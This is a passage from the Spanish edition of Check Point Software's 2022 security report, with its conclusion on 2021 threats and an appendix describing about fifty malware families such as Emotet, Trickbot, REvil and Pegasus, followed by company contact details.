∙ Implementación de las tecnologías más avanzadas de seguridad: No existe una sola tecnología cuya fórmula milagrosa pueda proteger de todas las amenazas y todos los vectores de amenaza. Sin embargo, existen muchas tecnologías increíbles e ideas disponibles: aprendizaje automático, espacio seguro, detección de anomalía, desarme de

C A P Í T U L O 7

64CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

CONCLUSIÓN Como se pronosticó, en un año que comenzó con la falla de uno de los más devastadores ataques en la cadena de suministro de la historia, hemos visto crecer en confianza y sofisticación a los agentes de amenazas. A fines de este año, esto termina con la explotación de vulnerabilidad de Log4j, que mantuvo a la comunidad de seguridad atenta y mostró el nivel insuperable de riesgo inherente para las cadenas de suministro de software. En los meses intermedios, vimos los servicios en la nube bajo ataque, los agentes de amenaza incrementar su enfoque en los dispositivos móviles, el secuestro extorsivo de Colonial Pipeline y el resurgimiento de unos de los más peligrosos botnets en la historia.

Pero no todo es tristeza y desolación. También vimos ampliarse las grietas en el ecosistema de ransomware en 2021, a medida que los gobiernos y las agencias del cumplimiento de la ley en todo el mundo resolvían tomar una postura más estricta en los grupos de ransomware en particular. En lugar de buscar una acción reactiva y correctiva, algunos eventos impactantes hacen que los gobiernos tomen consciencia sobre la necesidad de tener un enfoque más anticipado y proactivo para lidiar con el riesgo cibernético. La misma filosofía se extiende también a los negocios, que ya no pueden permitirse tener un enfoque desarticulado, aislado y reaccionario para lidiar con las amenazas. Necesitan una visibilidad de 360º, inteligencia contra amenazas en tiempo real e infraestructura de seguridad que se pueda movilizar de una manera efectiva y conjunta.

65CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 65CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

APÉNDICE DESCRIPCIONES DE FAMILIAS DE MALWARE

66CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

AgentTesla AgentTesla es un RAT avanzado que funciona como un registrador de pulsaciones de teclas e interceptación de contraseñas; ha estado activo desde 2014. Agent Tesla puede monitorear y recopilar el ingreso de datos a través del teclado de la víctima y del portapapeles del sistema, así como también tomar capturas de pantalla y extraer credenciales de una variedad de software instalados en la máquina de una víctima (incluidos Google Chrome, Mozilla Firefox y el cliente de correo electrónico Microsoft Outlook). Agent Tesla se vende en varios mercados en línea y foros de hackeo.

AlienBot AlienBot es un troyano bancario para Android que se vende ilegalmente como malware como servicio (MaaS). Admite registro de las pulsaciones de tecla, superposiciones dinámicas para robo de credenciales y obtención de SMS para omisión de 2FA. Se proveen capacidades de control remoto adicional usando un módulo de TeamViewer.

Bazar Bazar Loader y Bazar Backdoor se descubrieron en 2020 y fueron usados en las etapas iniciales de la infección por el grupo delictivo de delito cibernético WizardSpider. El cargador es responsable de alcanzar las etapas siguientes y la puerta trasera se creó para conservar la persistencia. Las infecciones generalmente están seguidas de una implementación de ransomware a escala completa, usando Conti o Ryuk.

CryptoBot CryptoBot es un criptominero avanzado que recopila la billetera de la víctima y la información de cuenta tras la infección. En Diciembre de 2021, se observó a CryptoBot en una campaña que se dirigía a usuarios con una copia pirateada del sistema operativo Windows.

Clop Clop es un ransomware que se descubrió por primera vez a principios de 2019 y que mayormente está dirigido a grandes empresas y corporaciones. Durante 2020, los operadores de Clop comenzaron a ejecutar una estrategia de doble extorsión donde, además de cifrar los datos de la víctima, los atacantes también amenazan con publicar información robada a menos que se cumplan las demandas de rescate. En 2021, el ransomware Clop se usó en numerosos ataques donde el acceso inicial fue obtenido al utilizar las vulnerabilidades del día cero en Accellion File Transfer Appliance.

67CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Danabot Danabot es un troyano bancario modular escrito en Delphi que va dirigido a la plataforma Windows. El malware, que apareció por primera vez en 2018, se distribuye mediante correos electrónicos maliciosos de spam. Una vez que un dispositivo está infectado, el malware descarga el código de configuración actualizado y otros módulos del servidor de C&C. Los módulos disponibles incluyen un “sniffer” para interceptar credenciales, un “stealer” para robar contraseñas de aplicaciones populares, un módulo “VNC” para control remoto y mucho más.

DarkGate DarkGate es un malware multifunción activo desde Diciembre de 2017 que combina capacidades de ransomware, robo de credenciales, RAT y criptominería. Al tener como objetivo principalmente al sistema operativo Windows, DarkGate emplea una variedad de técnicas de evasión.

Dridex Dridex es un troyano bancario devenido en botnet que tiene como objetivo la plataforma Windows. Se introduce mediante campañas de spam y kits de explotación, y se basa en seminarios web para interceptar y redirigir credenciales bancarias a un servidor controlado por los atacantes. Dridex contacta a un servidor remoto, envía información sobre el sistema infectado y puede descargar y ejecutar módulos adicionales para el control remoto.

Emotet Emotet es un troyano avanzado modular de autopropagación. Emotet se utilizó en su momento como un troyano bancario y ahora se utiliza como distribuidor de otros malware o campañas maliciosas. Utiliza múltiples métodos para mantener la persistencia y técnicas de evasión para eludir la detección. Además, Emotet también se puede propagar a través de correos electrónicos no deseados de suplantación de identidad (phishing) con enlaces o archivos adjuntos maliciosos.

FluBot FluBot es un malware de Android distribuido mediante mensajes SMS de suplantación de identidad (phishing) (SMiShing), a menudo suplantando las marcas de entrega de logística. Cuando el usuario hace clic en el enlace dentro del mensaje, se redirige a la descarga de la aplicación falsa que contiene a FluBot. Una vez instalado el malware, tiene muchas capacidades de recopilar credenciales y apoyar a la operación de SMishing en sí, incluidas la carga de la lista de contactos como así también el envío de mensajes de SMS a otros números telefónicos.

68CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

FlyTrap FlyTrap es un troyano de Android creado para robar credenciales de Facebook, la ubicación, dirección de correo electrónico, IP y más. El troyano se propaga originalmente mediante aplicaciones falsas de Android en Google Play, alentando a los usuarios a iniciar sesión en su cuenta de Facebook. En esta etapa, FlyTrap usa una inyección de JavaScript para secuestrar la sesión y envía los detalles al servidor de C&C, permitiendo que los atacantes obtengan acceso a la cuenta de Facebook desde una ubicación remota.

Formbook Formbook es un interceptor de información dirigido al sistema operativo Windows. Se detectó por primera vez en 2016. Se distribuye a modo de malware como servicio (MaaS) en foros de hackeo ilegales por sus sólidas técnicas de evasión y su precio relativamente bajo. Formbook recopila credenciales de varios navegadores web y capturas de pantalla, controla y registra pulsaciones de teclas, y puede descargar y ejecutar archivos de acuerdo con las órdenes de su C&C.

Glupteba Glupteba es una puerta trasera de Windows conocida desde 2011 que, gradualmente, se convirtió en un botnet. En 2019, ya incluía un mecanismo de actualización de dirección de C&C a través de listas públicas de bitcoins, un interceptor de navegador incorporado y un aprovechador de enrutador.

Hiddad Es un malware para Android que reempaqueta aplicaciones legítimas y, a continuación, las libera en tiendas de terceros. Su función principal es mostrar anuncios, pero también puede obtener acceso a datos de seguridad clave integrados en el sistema operativo.

IcedID IcedID es un troyano bancario que apareció por primera vez en Septiembre de 2017. Se propaga mediante campañas de spam y a menudo utiliza otros malware, como Emotet, para ayudar a su propagación. IcedID utiliza técnicas evasivas, como la inyección de procesos y la esteganografía, y roba datos financieros del usuario a través de ataques de redireccionamiento (instala un proxy local para redirigir a los usuarios a sitios clonados falsos) y ataques de inyección web.

Kinsing Descubierto en 2020, Kinsing es un criptominero Golang con un componente de rootkit. Originalmente diseñado para vulnerar los sistema de Linux, Kinsing se instaló en servidores afectados al abusar de las vulnerabilidades en los servicios que se conectan a Internet. A fines de 2021, se desarrolló también variante de malware de Windows, permitiendo que los atacantes aumentaran su superficie de ataque.

69CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

LemonDuck LemonDuck es un criptominero que fue descubierto por primera vez en 2018 que se dirige a los sistemas de Windows. Tiene módulos avanzados de propagación, incluyendo el envío de malspam, la fuerza bruta de RDP y la explotación en masa mediante vulnerabilidades conocidas como BlueKeep. Se observó que recopilaba correos electrónicos y credenciales con el paso del tiempo como así también enviaba otras familias de malware, como Ramnit.

LokiBot LokiBot es un interceptor de información de consumo para Windows. Recolecta credenciales desde diversas aplicaciones, navegadores web, clientes de correo electrónico, herramientas de administración de TI como PuTTY, etc. LokiBot se vende en foros de hackeo y se cree que su código fuente ha sido filtrado, lo que permite la aparición de una gran cantidad de variantes. Se identificó por primera vez en Febrero de 2016.

Mirai Mirai es un infame malware de IoT que rastrea dispositivos de IoT vulnerables, como cámaras web, módems y enrutadores, y los convierte en bots. El botnet es utilizado por sus operadores para llevar a cabo ataques masivos de denegación de servicio (DDoS). El botnet Mirai surgió en Septiembre de 2016. Llegó a ser noticia rápidamente debido a una serie de ataques de gran escala, lo que incluye un ataque de DDoS masivo utilizado para dejar a todo el país de Liberia fuera de línea, y un ataque de DDoS contra la organización de infraestructura de Internet Dyn, que proporciona una parte significativa de la infraestructura de Internet de Estados Unidos.

MyloBot MyloBot es un botnet sofisticado que emergió por primera vez en Junio de 2018 y está equipado con técnicas complejas de evasión que incluyen técnicas anti-VM, antisandbox y antidepuración. El botnet permite que un atacante tome control total del sistema del usuario y descargue cualquier carga útil adicional desde su C&C.

NanoCore NanoCore es un troyano de acceso remoto que fija los usuarios del sistema operativo Windows como objetivo y se observó por primera vez en la red en 2013. Todas las versiones de RAT contienen complementos básicos y funcionalidades, como capturas de pantalla, minería de criptomonedas, control remoto del robo de sesión de escritorio y cámara web.

70CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

NRSMiner NRSMiner es un criptominero que apareció en Noviembre de 2018 y se estaba extendiendo principalmente por Asia, en especial en Vietnam, China, Japón y Ecuador. Después de la infección inicial, utiliza el aprovechamiento famoso SMB EternalBlue para propagarse a otras computadoras vulnerables en redes internas y, eventualmente, comienza a minar la criptomoneda Monero (XMR).

Pegasus Pegasus es un spyware altamente sofisticado que se dirige a los dispositivos móviles de Android e iOS, desarrollado por el grupo israelí NSO. El malware se ofrece para la venta, mayoritariamente para organizaciones y corporaciones relacionadas con el gobierno. Pegasus puede aprovechar las vulnerabilidades que permiten una fuga silenciosa del dispositivo e instalan el malware. El malware infecta sus objetivos mediante numerosos medios: Los mensajes de SMS de suplantación de identidad (phishing) de objetivo definido que contienen un enlace malicioso o redirigen a una URL, sin necesitar ninguna acción del usuario (“cero clic”) y más. La aplicación presenta muchos módulos espía como la toma de captura de pantalla, el registro de llamadas, el acceso a las aplicaciones de mensajería, el registro de las pulsaciones de tecla y la filtración del historial del buscador.

Phorpiex Phorpiex, también conocido como Trik, es un botnet que ha estado activo desde 2010 y que, en su pico, llegó a controlar más de un millón de hosts infectados. Es conocido por distribuir otras familias de malware a través de campañas de spam, así como también por impulsar campañas de extorsión sexual y de spam de gran escala.

Qbot Qbot, también conocido como Qakbot, es un troyano bancario que apareció por primera vez en 2008. Fue diseñado para robar las credenciales bancarias y las pulsaciones de teclas de los usuarios. A menudo distribuido por correo electrónico de spam, Qbot emplea varias técnicas anti-VM, anti-depuración y anti-sandbox para dificultar el análisis y evadir la detección.

Raccoon El interceptor Raccoon se observó por primera vez en Abril de 2019. Este interceptor se dirige a los sistemas de Windows y se vende como malware como servicio (MaaS) en los foros ilegales. Es un interceptor simple capaz de recopilar las cookies del buscador, el historial, las credenciales de inicio de sesión, las billeteras de criptomonedas y la información de la tarjeta de crédito.

71CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Ragnar Locker Ragnar Locker es un ransomware que se descubrió por primera vez en Diciembre de 2019. Utiliza técnicas sofisticadas de evasión, incluida la implementación como una máquina virtual en sistemas específicos para ocultar su actividad. Ragnar se utilizó en un ataque contra la compañía eléctrica nacional de Portugal en un acto de doble extorsión, en el cual los atacantes publicaron datos confidenciales robados de la víctima.

Ramnit Ramnit es un troyano bancario modular que se descubrió por primera vez en 2010. Ramnit roba la información de la sesión web y brinda a los operadores la capacidad de robar las credenciales de las cuentas de todos los servicios utilizados por la víctima, incluidas cuentas bancarias, corporativas y de redes sociales. El troyano utiliza dominios con códigos fijos y dominios generados por un algoritmo de generación de dominio (Domain Generation Algorithm, DGA) para comunicarse con el servidor de C&C y descargar módulos adicionales.

RedLine Stealer RedLine Stealer es un interceptor en tendencia que se vio por primera vez en Marzo de 2020. Vendido como malware como servicio (MaaS) y, a menudo, distribuido mediante adjuntos maliciosos de correo electrónico, tiene todas las capacidades de un interceptor moderno: recopilación de información del buscador web (detalles de la tarjeta de crédito, cookies de la sesión, datos de autocompletar), obtención de billeteras de criptomoneda, la capacidad de descargar cargas útiles adicionales y más.

Remcos Remcos es un RAT que apareció por primera vez en línea en 2016. Remcos se distribuye a sí mismo a través de documentos maliciosos de Microsoft Office que se adjuntan a correos electrónicos SPAM, y está diseñado para evitar la seguridad de control de cuentas de usuario (User Account Control, UAC) de Microsoft Windows y ejecutar malware con privilegios de alto nivel.

RigEK RigEK, el más antiguo y conocido de los exploit kits actualmente operativos, existe, aproximadamente, desde mediados de 2014. Sus servicios están a la venta en foros de hackeo y en la red TOR. Algunos “emprendedores” incluso revenden infecciones de bajo volumen a aquellos desarrolladores de malware que todavía no son lo suficientemente grandes como para pagar por el servicio completo. RigEK ha evolucionado a lo largo de los años para entregar desde AZORult y Dridex hasta ransomware y criptomineros poco conocidos.

72CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

RubyMiner RubyMiner se vio por primera vez en línea en Enero de 2018 y está dirigido a servidores de Windows y Linux. RubyMiner busca servidores web vulnerables (como PHP, Microsoft IIS y Ruby on Rails) para usar en criptominería mediante el minero de Monero de código abierto XMRig.

Ryuk Ryuk es un ransomware utilizado por el grupo TrickBot en ataques dirigidos y bien planificados contra varias organizaciones en todo el mundo. El ransomware se derivó originalmente del ransomware Hermes, cuyas capacidades técnicas son relativamente bajas e incluyen un instalador básico y un esquema de cifrado sencillo. Sin embargo, Ryuk logró causar daños graves a las organizaciones objetivo y las forzó a pagar rescates extremadamente altos en bitcoins. A diferencia del ransomware común, distribuido sistemáticamente a través de campañas masivas de spam y kits de explotación, Ryuk se utiliza exclusivamente en ataques personalizados.

Snake Keylogger Snake Keylogger es un registrador de pulsaciones de teclas/interceptor modular .NET. Apareció alrededor de fines de 2020, creció rápido en popularidad entre los criminales cibernéticos. Snake es capaz de grabar las pulsaciones de teclas, tomar capturas de pantallas, obtener credenciales y contenido del portapapeles. Admite la filtración de datos robados tanto por los protocolos de HTTP y SMTP.

REvil REvil, también conocido como Sodinokibi, es un ransomware como servicio que opera un programa de “afiliados” y se detectó por primera vez en 2019. REvil cifra los datos en el directorio del usuario y elimina las copias de seguridad de instantáneas con el fin de dificultar la recuperación de los datos. Además, los afiliados de REvil utilizan varias tácticas para propagarlo a través del aprovechamiento de las vulnerabilidades de servidores y del spam, además de introducirlo por hackeo en los sistemas de back-end de los proveedores de servicios administrados (Managed Service Provider, MSP) y a través de campañas de publicidad maliciosa con redirección al kit de explotación de RIG.

SparrowDoor SparrowDoor es una puerta trasera avanzada usada por el grupo APT FamousSparrow para espiar en hoteles, gobiernos y más. Se detectó al aprovechar la vulnerabilidad de Microsoft Exchange ProxyLogon en Marzo de 2021. La puerta trasera se carga usando el secuestro de DLL en combinación con un binario legítimo para ayudar a evitar los productos de AV.

73CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

SunBurst SunBurst es la puerta trasera que se implantó en el software de gestión de TI Orion de SolarWinds durante 2020, como parte del ataque de la infame cadena de suministro, afectando a miles de organizaciones en todo el mundo. Es una puerta trasera persistente que brindó a los atacantes un punto de apoyo inicial dentro de las organizaciones. Si las máquinas infectadas pasaron todos los requisitos y no contenían muchos servicios restringidos o el software AV, Sunburst podría implementar después implantes adicionales de memoria (como TearDrop) para la ejecución de comandos y capacidades de movimiento lateral.

Triada Triada que se descubrió por primera vez en 2016, es una puerta trasera modular para Android que otorga privilegios de administrador para descargar otro malware. Su última versión se distribuye mediante kits de desarrollo de adware en WhatsApp para Android.

Trickbot TrickBot es un troyano bancario modular, atribuido al grupo delictivo de delito cibernético WizardSpider. Mayoritariamente enviadas mediante campañas vía spam y otras familias de malware como Emotet y BazarLoader. Trickbot envía información sobre el sistema infectado y también puede descargar y ejecutar módulos arbitrarios de una gran variedad de módulos disponibles, incluidos un módulo VNC para control remoto y un módulo SMB para propagarse dentro de una red afectada. Una vez que una máquina está infectada, los atacantes detrás de este malware utilizan esta amplia gama de módulos no solo para robar credenciales bancarias de la PC objetivo, sino también para el movimiento y reconocimiento laterales en la organización objetivo en sí, antes de implementar un ataque de ransomware dirigido a toda la compañía.

Ursnif Ursnif es una variante del troyano bancario de Gozi para Windows, cuyo código fuente se ha filtrado en línea. Tiene capacidades como las del ataque “Man-in-the- browser” para robar información y las credenciales bancarias para los servicios populares en línea. Además, puede robar información de clientes de correo electrónico, exploradores y billeteras de criptomonedas locales. Finalmente, puede descargar y ejecutar archivos adicionales en el sistema infectado.

Vidar Vidar es un interceptor de información que fija los sistemas operativos de Windows como objetivo. Se detectó por primera vez a fines de 2018 y está diseñado para robar contraseñas, datos de tarjetas de crédito y otra información confidencial de diversos navegadores web y billeteras digitales. Vidar se vende en varios foros en línea y se utiliza como un instalador de malware para descargar el ransomware GandCrab como su carga útil secundaria.

74CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

WannaMine WannaMine es un sofisticado gusano de criptominería Monero que se propaga mediante la vulnerabilidad de EternalBlue. WannaMine implementa un mecanismo de propagación y técnicas de persistencia al aprovechar las suscripciones de eventos permanentes del Instrumental de administración de Windows (Windows Management Instrumentation, WMI).

xHelper xHelper es un malware de Android que muestra principalmente anuncios intrusivos de ventanas emergentes y spam de notificaciones. Es muy difícil eliminarlo una vez instalado debido a sus capacidades de reinstalación. Se vio por primera vez en Marzo de 2019. Hasta el momento, ha infectado a más de 45 000 dispositivos.

XMRig XMRig es un software de minería de CPU de código abierto utilizado para extraer la criptomoneda Monero. Los atacantes a menudo hacen mal uso de este software de código abierto al integrarlo en su malware para realizar minería ilegal en los dispositivos de las víctimas.

Zloader Zloader es un malware bancario que utiliza inyecciones web para robar credenciales e información privada, y puede extraer contraseñas y cookies del navegador web de la víctima. Descarga VNC, lo que permite a los atacantes conectarse al sistema de la víctima y realizar transacciones financieras desde el dispositivo del usuario. Este troyano se vio por primera vez en 2016 y se basa en el código filtrado del malware Zeus de 2011. En 2020, el malware es muy popular entre los atacantes e incluye muchas variantes nuevas.

Z0Miner Z0Miner, visto por primera vez en Noviembre de 2020, es un criptominero que se encontró en miles de servidores vulnerados por la falla en la ejecución remota de código del servidor WebLogic de Oracle. El grupo detrás de Z0miner, desde entonces, ha aprovechado la vulnerabilidad de la ejecución del código remoto de Confluence de Atlassian (CVE-2021-26084), para infectar más servidores.

CONTÁCTENOS SEDE MUNDIAL

5 Ha’Solelim Street, Tel Aviv 67897, Israel Tel.: 972-3-753-4555 | Fax.: 972-3-624-1100

Correo electrónico: info@checkpoint.com

SEDE EN EE. UU. 959 Skyway Road, Suite 300, San Carlos, CA 94070

Tel.: 800-429-4391 | 650-628-2000 | Fax: 650-654-4233

¿ESTÁ SIENDO ATACADO? Póngase en contacto con nuestro equipo de respuesta ante incidentes:

emergency-response@checkpoint.com

PODCAST DE CHECK POINT RESEARCH Sintonice cp<radio> para obtener la investigación más reciente de CPR,

además del detrás de escena y otro contenido exclusivo. Visítenos en https://research.checkpoint.com/category/cpradio/

W W W . C H E C K P O I N T . C O M

© 1994-2022 Check Point Software Technologies Ltd. Todos los derechos reservados.

https://research.checkpoint.com/category/cpradio/ http://WWW.CHECKPOINT.COM


Item Type: pdf